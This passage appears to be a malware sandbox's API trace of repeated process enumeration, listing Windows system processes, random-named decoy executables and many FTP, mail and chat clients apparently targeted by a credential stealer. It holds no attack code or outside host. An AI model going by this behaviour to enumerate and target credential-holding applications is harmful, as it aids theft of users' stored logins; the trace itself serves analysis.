th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.100] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.101] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0228.103] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.105] Process32Next (in: hSnapshot=0x21f4, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0228.110] CloseHandle (hObject=0x21f4) returned 1 [0228.111] Sleep (dwMilliseconds=0x64) [0228.223] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21fc [0228.237] Process32First (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0228.239] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0228.241] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0228.245] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.248] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0228.251] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0228.253] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0228.255] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0228.257] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0228.259] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.261] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.293] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.295] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.297] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.304] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.306] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.308] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.310] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.312] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.314] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.315] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0228.317] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.319] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0228.321] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.323] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0228.325] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0228.327] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0228.329] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0228.331] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0228.374] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0228.377] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.379] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.382] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0228.384] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.387] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.390] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.392] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0228.395] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0228.397] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0228.399] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0228.402] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0228.403] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0228.405] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0228.407] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0228.447] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0228.449] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0228.453] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0228.455] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0228.456] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0228.458] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0228.460] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0228.462] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0228.464] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0228.465] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0228.467] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0228.469] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0228.471] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0228.474] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0228.476] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0228.478] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0228.480] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0228.565] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0228.567] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0228.570] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0228.572] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0228.574] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0228.576] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0228.579] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0228.581] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0228.583] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0228.585] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0228.587] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0228.590] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0228.592] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0228.594] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0228.596] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0228.597] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0228.600] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0228.612] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0228.615] Process32Next (in: hSnapshot=0x21fc, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 